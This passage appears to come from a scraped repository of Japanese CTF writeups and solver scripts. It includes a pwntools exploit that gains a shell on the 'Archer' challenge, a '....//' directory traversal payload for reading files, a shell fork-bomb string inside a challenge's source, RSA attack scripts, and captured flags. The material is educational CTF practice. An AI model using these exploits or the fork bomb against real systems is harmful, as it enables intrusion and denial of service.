􆆗􇺟 2008, 􄧻􁫞􇽛􋐝􊸉􉯓 􏕈􆖓􇺟 􇽛􉂫􊸉 􌘗􇽛􊶬 􊸉􌲔􃗁􆖓􃄏􊸉 􌘗􌲔􁫞􆆗􄺷 􄧻􏕈􄧻􃗁􉗽 􌶴􆖓􃗁 􆞎􊸉􁫞􇽛 􄧻􄺷􇽛 􊸉􊶬􊸉􃗁 􏕈􆆗􇽛􉂫 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚, 􄧻􁫞 􄧻 􃗁􊸉􁫞􌲔􋐝􇽛 􆖓􌶴 􄺷􆖓􋐝􋐝􊸉􄺷􇽛􆆗􊶬􊸉 􊶬􆖓􇽛􆆗􇺟􋄚 􌶴􃗁􆖓􌘗 􇽛􉂫􆖓􌲔􁫞􄧻􇺟􉗽􁫞 􆖓􌶴 􃄏􊸉􆖓􃄏􋐝􊸉 􆖓􇺟 􇽛􉂫􊸉 􆆗􇺟􇽛􊸉􃗁􇺟􊸉􇽛, 􉗽􌲔􊸉 􇽛􆖓 􇽛􉂫􊸉 􃄏􆖓􃄏􌲔􋐝􄧻􃗁 􃄏􉂫􊸉􇺟􆖓􌘗􊸉􇺟􆖓􇺟 􆖓􌶴 􃗁􆆗􄺷􏟟􃗁􆖓􋐝􋐝􆆗􇺟􋄚.[7] 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚 􆆗􁫞 􄺷􆖓􇺟􁫞􆆗􉗽􊸉􃗁􊸉􉗽 􄧻􁫞􇽛􋐝􊸉􉯓'􁫞 􁫞􆆗􋄚􇺟􄧻􇽛􌲔􃗁􊸉 􁫞􆖓􇺟􋄚 􄧻􇺟􉗽 􆆗􇽛 􆆗􁫞 􆖓􌶴􇽛􊸉􇺟 􃄏􋐝􄧻􉯓􊸉􉗽 􄧻􇽛 􇽛􉂫􊸉 􊸉􇺟􉗽 􆖓􌶴 􉂫􆆗􁫞 􋐝􆆗􊶬􊸉 􄺷􆖓􇺟􄺷􊸉􃗁􇽛􁫞.\n\n􆆗􇺟 2019, 􄧻􁫞􇽛􋐝􊸉􉯓 􃗁􊸉􄺷􆖓􃗁􉗽􊸉􉗽 􄧻􇺟􉗽 􃗁􊸉􋐝􊸉􄧻􁫞􊸉􉗽 􄧻 '􃄏􆆗􄧻􇺟􆖓􌶴􆖓􃗁􇽛􊸉' 􊶬􊸉􃗁􁫞􆆗􆖓􇺟 􆖓􌶴 􇽛􉂫􊸉 􁫞􆖓􇺟􋄚 􌶴􆖓􃗁 􉂫􆆗􁫞 􄧻􋐝􆞎􌲔􌘗 􇽛􉂫􊸉 􆞎􊸉􁫞􇽛 􆖓􌶴 􌘗􊸉, 􏕈􉂫􆆗􄺷􉂫 􌶴􊸉􄧻􇽛􌲔􃗁􊸉􁫞 􄧻 􇺟􊸉􏕈 􃄏􆆗􄧻􇺟􆖓 􄧻􃗁􃗁􄧻􇺟􋄚􊸉􌘗􊸉􇺟􇽛.[8]\n\n􁫞􉂫􄧻􌘗􊸉􋐝􊸉􁫞􁫞􋐝􉯓 􄺷􆖓􃄏􆆗􊸉􉗽 􌶴􃗁􆖓􌘗 [􏕈􆆗􏟟􆆗􃄏􊸉􉗽􆆗􄧻'􁫞 􄧻􃗁􇽛􆆗􄺷􋐝􊸉 􆖓􇺟 􇽛􉂫􊸉 􁫞􌲔􆞎􀴠􊸉􄺷􇽛](􉂫􇽛􇽛􃄏􁫞://􊸉􇺟.􏕈􆆗􏟟􆆗􃄏􊸉􉗽􆆗􄧻.􆖓􃗁􋄚/􏕈􆆗􏟟􆆗/􇺟􊸉􊶬􊸉􃗁_􋄚􆖓􇺟􇺟􄧻_􋄚􆆗􊶬􊸉_􉯓􆖓􌲔_􌲔􃄏)\n\n􆞎􄺷􄧻􄺷􇽛􌶴{􁫞􆖓􃗁􃗁􉯓_􏕈􊸉_􃗁􄧻􇺟_􆖓􌲔􇽛_􆖓􌶴_􃗁􌲔􇺟􊸉􁫞_􁫞􀴠􃗁􉂫􏕈􆞎􋄚}\n```\n\n読めない文字は、バイナリにしてみると必ず`F4`から始まる4バイトになっていることが分かった。\n\n文字列中の`XXXXX://`は`https://`だろうと予測して`F4`から始まる4バイトを別のアルファベットに変換していったところ、フラグが得られた。\n\n```py\ncipher = open(\"ciphertext.md\",\"rb\").read()\n\nbyte = []\nfor i,c in enumerate(cipher):\n if(c == 0xf4):\n if(cipher[i:i+4] not in byte):\n byte.append(cipher[i:i+4])\n\nbyte = sorted(byte)\n\n# byte = [b'\\xf4\\x80\\xb4\\xa0', b'\\xf4\\x81\\xab\\x9e', b'\\xf4\\x83\\x84\\x8f', b'\\xf4\\x83\\x97\\x81', b'\\xf4\\x84\\xa7\\xbb', b'\\xf4\\x84\\xba\\xb7', b'\\xf4\\x86\\x86\\x97', b'\\xf4\\x86\\x96\\x93', b'\\xf4\\x86\\x9e\\x8e', b'\\xf4\\x87\\xba\\x9f', b'\\xf4\\x87\\xbd\\x9b', b'\\xf4\\x89\\x82\\xab', b'\\xf4\\x89\\x97\\xbd', b'\\xf4\\x89\\xaf\\x93', b'\\xf4\\x8a\\xb6\\xac', b'\\xf4\\x8a\\xb8\\x89', b'\\xf4\\x8b\\x84\\x9a', b'\\xf4\\x8b\\x90\\x9d', b'\\xf4\\x8c\\x98\\x97', b'\\xf4\\x8c\\xb2\\x94', b'\\xf4\\x8c\\xb6\\xb4', b'\\xf4\\x8f\\x95\\x88', b'\\xf4\\x8f\\x9f\\x9f']\nchar = [ \"(\" + str(i) + \")\" for i in range(len(byte))]\n\n# guess from result\nchar[11] = \"h\"\nchar[10] = \"t\"\nchar[2] = \"p\"\nchar[1] = \"s\"\nchar[8] = \"b\"\nchar[5] = \"c\"\nchar[4] = \"a\"\nchar[20] = \"f\"\nchar[15] = \"e\"\nchar[19] = \"u\"\nchar[3] = \"r\"\nchar[7] = \"o\"\nchar[9] = \"n\"\nchar[12] = \"d\" \nchar[17] = \"l\"\nchar[6] = \"i\"\nchar[21] = \"w\"\nchar[22] = \"k\"\nchar[16] = \"g\"\nchar[14] = \"v\"\nchar[13] = \"y\"\nchar[0] = \"j\"\nchar[18] = \"m\"\n\ntranslate = dict(zip(byte,char))\n\nplain = \"\"\ncnt = 0\nwhile(cnt < len(cipher)):\n c = cipher[cnt]\n if(c == 0xf4):\n plain += translate[cipher[cnt:cnt+4]]\n cnt += 4\n else:\n plain += chr(cipher[cnt])\n cnt += 1\n\nprint(plain)\n```\n\n<!-- bcactf{sorry_we_ran_out_of_runes_sjrhwbg} -->\n" }, { "alpha_fraction": 0.32775330543518066, "alphanum_fraction": 0.3841409683227539, "avg_line_length": 39.53571319580078, "blob_id": "422be2599307826f94efa886b7f3f21850eb0fd5", "content_id": "9e02d26f1be7ecb4d54a349f1368bdb25caf7e93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1135, "license_type": "no_license", "max_line_length": 94, "num_lines": 28, "path": "/2021/ImaginaryCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# ImaginaryCTF 2021\n\n* https://2021.imaginaryctf.org/\n\n* 2021/07/24 01:00 JST - 2021/07/28 01:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | -------------------------------------------- | -------------- | ----: | -----: |\n| Web | [Build-A-Website](Build-A-Website) | SSTI | 100 | ? |\n| Crypto | [Chicken Caesar Salad](Chicken_Caesar_Salad) | ROT | 50 | ? |\n| Misc | [Formatting](Formatting) | Python, format | 100 | ? |\n| Forensics | [Hidden](Hidden) | strings | 50 | ? |\n| Misc | [Imaginary](Imaginary) | PPC | 100 | ? |\n| Crypto | [Rock Solid Algorithm](Rock_Solid_Algorithm) | RSA, e=5 | 100 | ? 
|\n| Web | [Roos World](Roos_World) | Devtools | 50 | ? |\n| Pwn | [stackoverflow](stackoverflow) | BOF | 50 | ? |\n\n---\n\n## Result\n\n* 630 points\n\n* 309 / 1018 (> 1 pt)\n" }, { "alpha_fraction": 0.6020671725273132, "alphanum_fraction": 0.6459948420524597, "avg_line_length": 18.399999618530273, "blob_id": "77ca8d8be874454af61d09735de51fe53d8011e3", "content_id": "e6ffb0998055fb09189af7606b017795247a5f92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 40, "num_lines": 20, "path": "/2020/WaniCTF/exclusive/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# ファイル読み込み\nwith open('./output.txt') as f:\n ciphertext = f.read()\n\n# s1,s2に対してXOR演算を行う\ndef decrypt(s1, s2):\n assert len(s1) == len(s2)\n\n result = \"\"\n for c1, c2 in zip(s1, s2):\n result += chr(ord(c1) ^ ord(c2))\n return result\n\n# 先頭3文字のXORをとってKeyを計算\nkey = decrypt(ciphertext[0:3],'FLA')\n\n# Keyの繰り返しと暗号文のXORを計算\nplaintext = decrypt(key*19,ciphertext)\n\nprint(plaintext)" }, { "alpha_fraction": 0.3014425039291382, "alphanum_fraction": 0.34959694743156433, "avg_line_length": 84.70909118652344, "blob_id": "a629c920de1ccf0bd9b163d3aa200468853d31b9", "content_id": "0fff9dd85b0ce344b4f54fb0daefdc15245c55d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4770, "license_type": "no_license", "max_line_length": 136, "num_lines": 55, "path": "/2021/BCACTF_2.0/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# BCACTF 2.0\n\n* https://bcactf.com/\n\n * https://github.com/BCACTF\n\n* 2021/06/11 09:00 JST — 2021/06/14 09:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ----------------------------------------------------------------- | ----------------------------------- | ----: | -----: |\n| Web | [Agent Gerald](Agent_Gerald) | User Agent | 125 | 458 |\n| Pwn | [BCA Mart](BCA_Mart) | integer overflow | 75 | 279 |\n| Crypto | [Cipher Mishap](Cipher_Mishap) | Octal, ROT | 75 | 188 |\n| Web | [Countdown Timer](Countdown_Timer) | Devtools, JavaScript | 75 | 435 |\n| Reversing | [Digitally Encrypted 1](Digitally_Encrypted_1 ) | XOR, Circuit diagram | 75 | 172 |\n| Crypto | [Easy RSA](Easy_RSA) | RSA | 50 | 394 |\n| Crypto | [FNES 1](FNES_1) | XOR | 150 | 50 |\n| Forensics | [Gerald's New Job](Geralds_New_Job) | PDF, binwalk | 100 | 251 |\n| Web | [Home Automation](Home_Automation) | Cookie | 75 | 566 |\n| Pwn | [Honors ABCs](Honors_ABCs) | Buffer overflow | 75 | 254 |\n| Forensics | [Infinite Zip](Infinite_Zip) | zip | 75 | 347 |\n| Forensics | [It's All Coming Together](Its_All_Coming_Together) | continued fraction | 175 | 8 |\n| Misc | [I Can Haz Interwebz?](I_Can_Haz_Interwebz) | nc | 50 | 575 |\n| Crypto | [Little e](Little_e) | RSA, e=3 | 100 | 231 |\n| Forensics | [More than Meets the Eye](More_than_Meets_the_Eye) | Zero width space (ZWSP) | 100 | 177 |\n| Web | [Movie-Login-1](Movie-Login-1) | SQL injection | 100 | 460 |\n| Web | [Movie-Login-2](Movie-Login-2) | SQL injection | 150 | 346 |\n| Web | [Movie-Login-3](Movie-Login-3) | SQL injection | 200 | 295 |\n| Crypto | [RSAtrix 1](RSAtrix_1) | RSA | 125 | 119 |\n| Crypto | [RSAtrix 2](RSAtrix_2) | RSA, matrix | 200 | 42 |\n| Crypto | [Sailing Thru Decryption](Sailing_Thru_Decryption) | International maritime signal flags | 75 | 161 |\n| Forensics | [Secure Zip](Secure_Zip) | zip, 
John The Ripper | 100 | 286 |\n| Crypto | [Slightly Harder RSA](Slightly_Harder_RSA) | RSA, n factorization | 75 | 312 |\n| Reversing | [Storytime: The Opening Gambit](Storytime_The_Opening_Gambit) | strings | 75 | 363 |\n| Reversing | [Storytime: The Tragic Interlude](Storytime_The_Tragic_Interlude) | Ghidra | 125 | 143 |\n| Reversing | [Wait, this isn't C](Wait_this_isnt_C) | Ghidra, edit binary | 150 | 118 |\n| Web | [Wasm Protected Site 1](Wasm_Protected_Site_1) | wasm | 100 | 438 |\n| Web | [Wasm Protected Site 2](Wasm_Protected_Site_2) | wasm, debug | 250 | 102 |\n| Misc | [Welcome to the Casino](Welcome_to_the_Casino) | nc script | 125 | 98 |\n| Forensics | [Zstegosaurus](Zstegosaurus) | zsteg | 75 | 306 |\n| Crypto | [􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉](􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉) | substitution | 75 | 164 |\n\n---\n\n## Result\n\n* 3450 points\n\n* 87 / 841 (> 1 pt)\n\n* 87 / 962\n" }, { "alpha_fraction": 0.5340101718902588, "alphanum_fraction": 0.5857868194580078, "avg_line_length": 20.413043975830078, "blob_id": "b0b7410d5097170d672a61b2fbadba4220309222", "content_id": "163145cdf51f663fc6e02fc51ca004594b3be463", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2199, "license_type": "no_license", "max_line_length": 116, "num_lines": 92, "path": "/2021/RaRCTF_2021/unrandompad/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\nfrom random import getrandbits\nfrom Crypto.Util.number import getPrime, long_to_bytes, bytes_to_long\n\ndef keygen(): # normal rsa key generation\n primes = []\n e = 3\n for _ in range(2):\n while True:\n p = getPrime(1024)\n if (p - 1) % 3:\n break\n primes.append(p)\n return e, primes[0] * primes[1]\n\ndef pad(m, n): # pkcs#1 v1.5\n ms = long_to_bytes(m)\n ns = long_to_bytes(n)\n if len(ms) >= len(ns) - 11:\n return -1\n padlength = len(ns) - len(ms) - 3\n ps = long_to_bytes(getrandbits(padlength * 8)).rjust(padlength, b\"\\x00\")\n return int.from_bytes(b\"\\x00\\x02\" + ps + b\"\\x00\" + ms, \"big\")\n\ndef encrypt(m, e, n): # standard rsa\n res = pad(m, n)\n if res != -1:\n print(f\"c: {pow(m, e, n)}\")\n else:\n print(\"error :(\", \"message too long\")\n\nmenu = \"\"\"\n[1] enc()\n[2] enc(flag)\n[3] quit\n\"\"\"[1:]\n\ne, n = keygen()\nprint(f\"e: {e}\")\nprint(f\"n: {n}\")\nwhile True:\n try:\n print(menu)\n opt = input(\"opt: \")\n if opt == \"1\":\n encrypt(int(input(\"msg: \")), e, n)\n elif opt == \"2\":\n encrypt(bytes_to_long(open(\"/challenge/flag.txt\", \"rb\").read()), e, n)\n elif opt == \"3\":\n print(\"bye\")\n exit(0)\n else:\n print(\"idk\")\n except Exception as e:\n print(\"error :(\", e)\n```\n\n中身は`e=3`のRSA暗号である。`pad`関数は暗号化に使われていないため、無視してもよい。\n\nおそらく暗号文が長いため、3乗根を取るだけではうまくいかない。\n\n接続しなおせば、`n`が異なる`c`が複数個分かるるため、Håstad's Broadcast Attackを使って平文\nを求める。\n\n```py\n# sage\nfrom pwn import *\nimport re\nfrom Crypto.Util.number import *\n\ne, n, c = 3, [], []\n\nfor _ in range(3):\n io = remote('193.57.159.27', 28572)\n io.recvline() # e\n n.append(int(re.search(r'n: (\\d+)' , str(io.recvline())).group(1)))\n\n io.recvuntil('opt: ')\n io.sendline('2')\n c.append(int(re.search(r'c: (\\d+)' , str(io.recvline())).group(1)))\n io.close()\n\nx = CRT_list(c,n)\n\nprint(long_to_bytes(x^(1/e)))\n```\n\n<!-- rarctf{https://cdn.discordapp.com/attachments/751845431063085160/866641917714235392/unknown.png_8538853c64} -->\n" }, { "alpha_fraction": 0.5447306632995605, "alphanum_fraction": 0.6421545743942261, "avg_line_length": 18.768518447875977, "blob_id": 
"c7a52cb7d0273c064fd4cff7e9c7493df582691f", "content_id": "c2cd9711e15c2109a4888b58dc971ce9544afc26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2373, "license_type": "no_license", "max_line_length": 83, "num_lines": 108, "path": "/2021/RaRCTF_2021/Archer/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ ./archer\nIt's battle day archer! Have you got what it takes?\nAnswer [yes/no]: yes\nAwesome! Make your shot.\nHere's your arrow!\nNow, which soldier do you wish to shoot?\nhoge\n[1] 28581 segmentation fault ./archer\n```\n\nGhidraで解析してみる。\n\n```c\nundefined8 main(void)\n\n{\n char *pcVar1;\n char local_d [5];\n \n puts(\"It\\'s battle day archer! Have you got what it takes?\");\n printf(\"Answer [yes/no]: \");\n fflush(stdout);\n fgets(local_d,5,stdin);\n pcVar1 = strstr(local_d,\"no\");\n if (pcVar1 != (char *)0x0) {\n puts(\"Battle isn\\'t for everyone.\");\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n puts(\"Awesome! Make your shot.\");\n makeshot();\n puts(\"Hope you shot well! This will decide the battle.\");\n if (code == 0x13371337) {\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n puts(\"WE WON!\");\n fflush(stdout);\n system(\"/bin/sh\");\n return 0;\n}\n\n\nvoid makeshot(void)\n\n{\n undefined8 *local_10;\n \n puts(\"Here\\'s your arrow!\");\n puts(\"Now, which soldier do you wish to shoot?\");\n fflush(stdout);\n __isoc99_scanf(&DAT_00402109,&local_10);\n local_10 = local_10 + 0xa0000;\n *local_10 = 0;\n puts(\"Shot!\");\n return;\n}\n```\n\n`makeshot`関数では、入力した値 + 0x500000 のアドレスの中身を`0`に書き換えてくれることが分かった。\n\n```\n004012c0 48 05 00 ADD RAX,0x500000\n 00 50 00\n\n↓\n\nlocal_10 = local_10 + 0xa0000;\n```\n\nこれを利用して、`main`関数内の`code`変数を`0`に書き換える。\n\n`code`変数は`0x404068`に確保されていることが分かったので、`0x404068-0x500000`の値を渡すと`code`変数が`0`に書き換えられる。\n\n```py\nfrom pwn import *\n\ne = ELF('archer')\nio = remote('193.57.159.27', 23258)\n\nio.recvuntil(': ')\nio.sendline('yes')\nio.recvuntil('?\\n')\nh = str(hex(e.symbols['code']-0x500000)).replace('0x','')\nio.sendline(h)\nio.interactive()\n```\n\n```bash\n$ python3 solver.py\n[+] Opening connection to 193.57.159.27 on port 23258: Done\n[*] Switching to interactive mode\nShot!\nHope you shot well! 
\n\n```py\nfrom pwn import *\n\ne = ELF('archer')\nio = remote('193.57.159.27', 23258)\n\nio.recvuntil(': ')\nio.sendline('yes')\nio.recvuntil('?\\n')\nh = str(hex(e.symbols['code']-0x500000)).replace('0x','')\nio.sendline(h)\nio.interactive()\n```\n\n```bash\n$ python3 solver.py\n[+] Opening connection to 193.57.159.27 on port 23258: Done\n[*] Switching to interactive mode\nShot!\nHope you shot well! This will decide the battle.\nWE WON!\n$ ls\narcher\nflag_0a52f21b1a.txt\n$ cat flag_0a52f21b1a.txt\nrarctf{sw33t_sh0t!_1nt3g3r_0v3rfl0w_r0cks!_170b2820c9}\n```\n\n<!-- rarctf{sw33t_sh0t!_1nt3g3r_0v3rfl0w_r0cks!_170b2820c9} -->\n" }, { "alpha_fraction": 0.6567164063453674, "alphanum_fraction": 0.6641790866851807, "avg_line_length": 25.799999237060547, "blob_id": "1fd7cf4d9eab73c17118f4a52947d8e5c1db9823", "content_id": "902476e354d954700c2277a223afe95a271cd834", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 78, "num_lines": 5, "path": "/2021/WaniCTF21-spring/Simple_conversion/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\n\nc = open(os.path.dirname(__file__)+\"/cry-simple-conversion/output.txt\").read()\nm = bytes.fromhex(hex(int(c))[2:])\nprint(m)\n" }, { "alpha_fraction": 0.6740331649780273, "alphanum_fraction": 0.7955800890922546, "avg_line_length": 59.33333206176758, "blob_id": "f57df9d5b72eca11db6db15ec01e4e5aa51b3abe", "content_id": "f4b630238d6b014050f43f3ee309774c86f95a9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 181, "license_type": "no_license", "max_line_length": 107, "num_lines": 3, "path": "/2021/dCTF_2021/Bad_Apple/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Someone stumbled upon this file in a secure server. What could it mean?\n\n[Bad_Apple.mp4](https://dctf.dragonsec.si/files/230afaac6d3b52b608268829e8aa11d0/Bad_Apple.mp4?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTU5fQ.YJ_N4w.0vJLfjRs9ynSQLFDyDpwv51oJQA)\n" }, { "alpha_fraction": 0.6516854166984558, "alphanum_fraction": 0.7415730357170105, "avg_line_length": 14, "blob_id": "8085c08a7c799cae9434d4b1ca9ca719a2464a70", "content_id": "7106136ade66f66fb4c0d53c4134431f6a140af6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 89, "license_type": "no_license", "max_line_length": 25, "num_lines": 6, "path": "/2020/HITCON_CTF_2020/Welcome/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It's a reverse challenge.\n\n`ssh [email protected]`\npassword: hitconctf\n\nAuthor: hitcon" }, { "alpha_fraction": 0.7268518805503845, "alphanum_fraction": 0.7384259104728699, "avg_line_length": 32.30769348144531, "blob_id": "8a5a2861f9b39bf91594a1534b765903651218a6", "content_id": "a26f0a63ab4a053b5709153179a9016a0711f4c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 786, "license_type": "no_license", "max_line_length": 95, "num_lines": 13, "path": "/2020/WaniCTF/Simple_Memo/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nThe page takes a file path in the `file` parameter and displays that file, as in `https://simple.wanictf.org/index.php?file=test.txt`.\n\nThe hint says this is a directory traversal, so we would like to use a relative `../`, but it gets sanitized if sent as-is, so a small trick is needed.\n\nEach `../` is stripped out (replaced with an empty string), so supplying `....//` leaves exactly `../` behind after the replacement.
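\n\nThat substitution is easy to sanity-check; here is the same behavior mimicked in Python (the server does it in PHP):\n\n```\n>>> '....//'.replace('../', '')\n'../'\n```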
"ffad866c5a88b5675e7b87033f21107e95177f8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 850, "license_type": "no_license", "max_line_length": 181, "num_lines": 21, "path": "/2020/pbctf_2020/Not-stego/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nPNGファイルが与えられる。問題タイトルが Not-stego なので、steganography ではないと信じる。\n\n画像を表示すると、アセンブリ言語が書かれている。\n\n![](./profile.png)\n\n命令を見ても何か意味があるように思えない(いきなり`dec`で始まったり、謎のアドレスに`jump`したり)ので、データ部分を文字列に変換してみる。\n\n* [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')&input=NDg2NTcyNjUyNzczMjA2ZDc5MjA2YzY5NmU2YjNhMjA2ODc0NzQ3MDczM2EyZjJmNzA2MTczNzQ2NTYyNjk2ZTJlNjM2ZjZkMmY2YTM2NTg2NDM5NDc0ZTRkMjAyMDNjMmQyZDIwNDg2NTY4NjU2ODY1Njg2NTIxMjA1MzY1NjUyMDY5NjYyMDc5NmY3NTIwNjM2MTZlMjA1MjQ1MjA2ZDY1)\n\nすると、以下のメッセージが現れた。\n\n```\nHere's my link: https://pastebin.com/j6Xd9GNM <-- Hehehehe! See if you can RE me\n```\n\nリンク先を見るとフラグが書かれている。\n\n<!-- pbctf{3nc0d1ng_w1th_ass3mbly} -->" }, { "alpha_fraction": 0.8271604776382446, "alphanum_fraction": 0.8395061492919922, "avg_line_length": 15.399999618530273, "blob_id": "55ce5526704b04d6e814f8dcfe57b211c5ebea7e", "content_id": "234f1025999a845e849c5d0528c2cc1a207b9d0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 145, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/2020/WaniCTF/DevTools_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "ブラウザの開発者ツールを使ってソースコードをのぞいてみましょう!\n\nhttps://devtools1.wanictf.org\n\nWriter : suuhito" }, { "alpha_fraction": 0.5624468922615051, "alphanum_fraction": 0.5994052886962891, "avg_line_length": 23.52083396911621, "blob_id": "81ee778f2cd47a80ab4761ef77e13e95b2908019", "content_id": "b43064e29d31991a9a15dee9ce4e0baa3ce9da3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2498, "license_type": "no_license", "max_line_length": 193, "num_lines": 96, "path": "/2021/ImaginaryCTF_2021/Imaginary/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\n#!/usr/bin/env python3\n\nimport random\nfrom solve import solve\n\nbanner = '''\nWelcome to the Imaginary challenge! I'm gonna give you 300 imaginary/complex number problems, and your job is to solve them all. Good luck!\n\nSample input: (55+42i) + (12+5i) - (124+15i)\nSample output: -57+32i\n\nSample input: (23+32i) + (3+500i) - (11+44i)\nSample output: 15+488i\n\n(NOTE: DO NOT USE eval() ON THE CHALLENGE OUTPUT. TREAT THIS IS UNTRUSTED INPUT. Every once in a while the challenge will attempt to forkbomb your system if you are using eval(), so watch out!)\n'''\n\nflag = open(\"flag.txt\", \"r\").read()\nops = ['+', '-']\n\nprint(banner)\n\nfor i in range(300):\n\to = random.randint(0,50)\n\tif o > 0:\n\t\tnums = []\n\t\tchosen_ops = []\n\t\tfor n in range(random.randint(2, i+2)):\n\t\t\tnums.append([random.randint(0,50), random.randint(0,50)])\n\t\t\tchosen_ops.append(random.choice(ops))\n\t\tout = \"\"\n\t\tfor op, num in zip(chosen_ops, nums):\n\t\t\tout += f\"({num[0]}+{num[1]}i) {op} \"\n\t\tout = out[:-3]\n\t\tprint(out)\n\t\tans = input(\"> \")\n\t\tif ans.strip() == solve(out).strip():\n\t\t\tprint(\"Correct!\")\n\t\telse:\n\t\t\tprint(\"That's incorrect. 
:(\")\n\t\t\texit()\n\telse:\n\t\tn = random.choice(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\")\n\t\tpayload = f\"__import__['os'].system('{n}(){{ {n}|{n} & }};{{{n}}}')\"\n\t\tprint(payload)\n\t\tinput(\"> \")\n\t\tprint(\"Correct!\")\n\nprint(\"You did it! Here's your flag!\")\nprint(flag)\n```\n\n与えられた計算式に対して、300回計算に成功すればフラグが得られそうなので、プログラムを書く。\n\n```py\nfrom pwn import *\nimport re\nfrom tqdm import tqdm\n\nio = remote('chal.imaginaryctf.org', '42015')\n\nio.recvuntil('so watch out!)\\n\\n')\n\nfor _ in tqdm(range(300)):\n out = io.recvline().decode('utf-8')\n nums = list(re.findall(r'\\(([0-9i+-]+)\\)', out))\n opts = list(re.findall(r'\\) ([+-]) \\(', out))\n opts = ['+'] + opts # first number is positive\n real, image = 0, 0\n for idx, num in enumerate(nums):\n num = list(map(int, list(re.findall(r'\\d+', num))))\n if opts[idx] == '+':\n real += num[0]\n image += num[1]\n else:\n real -= num[0]\n image -= num[1]\n if image >= 0:\n io.sendline(f'{real}+{image}i')\n else:\n io.sendline(f'{real}{image}i')\n if b'Correct!' not in io.recvline():\n break\n\nio.interactive()\nio.close()\n```\n\n最後にフラグが出力された。\n\n<!-- ictf{n1c3_y0u_c4n_4dd_4nd_subtr4ct!_49fd21bc} -->\n" }, { "alpha_fraction": 0.8372092843055725, "alphanum_fraction": 0.8552971482276917, "avg_line_length": 34.181819915771484, "blob_id": "95f42318a30aca70e7c8012a2edbd46479e11d59", "content_id": "a65d16053ba8f15026b271e36dc25a37ca7506e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 657, "license_type": "no_license", "max_line_length": 129, "num_lines": 11, "path": "/2021/WaniCTF21-spring/CloudFront_Basic_Auth/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "API Gateway, Lambda, S3, CloudFront, CloudFormationを使ってアプリを作ってみました。\n\n重要なエンドポイントにはBasic認証をつけてみました。\n\nhttps://cf-basic.web.wanictf.org/\n\nヒント: 上のURLにアクセスするとexceptionと同じ見た目のWebアプリが表示されますが、添付されているzipファイルにはexceptionの添付ファイルから新しいファイルが追加されています。添付ファイルを参考にもう一つのFLAGを発見してください!\n\n[web-cf-basic.zip](https://score.wanictf.org/storage/xq6t17wy5cijqtu4dpscrcfbxjk0sewk/web-cf-basic.zip)\n\nWriter : suuhito\n" }, { "alpha_fraction": 0.5029354095458984, "alphanum_fraction": 0.5283757448196411, "avg_line_length": 27.38888931274414, "blob_id": "9bf43feaefed6d49f222c54ca712405fca2a1b34", "content_id": "51e8b2a292c33d35c5d53d684fbe5f5a8a2bd1cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 511, "license_type": "no_license", "max_line_length": 54, "num_lines": 18, "path": "/2021/angstromCTF_2021/Follow_the_Currents/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\nimport zlib\ndef keystream(key):\n index = 0\n while 1:\n index+=1\n if index >= len(key):\n key += zlib.crc32(key).to_bytes(4,'big')\n yield key[index]\nwith open(os.path.dirname(__file__)+\"/enc\",\"rb\") as f:\n cipher = f.read()\n for n in range(256*256):\n plaintext = []\n k = keystream(n.to_bytes(2,'big'))\n for i in cipher:\n plaintext.append(i ^ next(k))\n if b'actf{' in bytes(plaintext) :\n print(bytes(plaintext))\n" }, { "alpha_fraction": 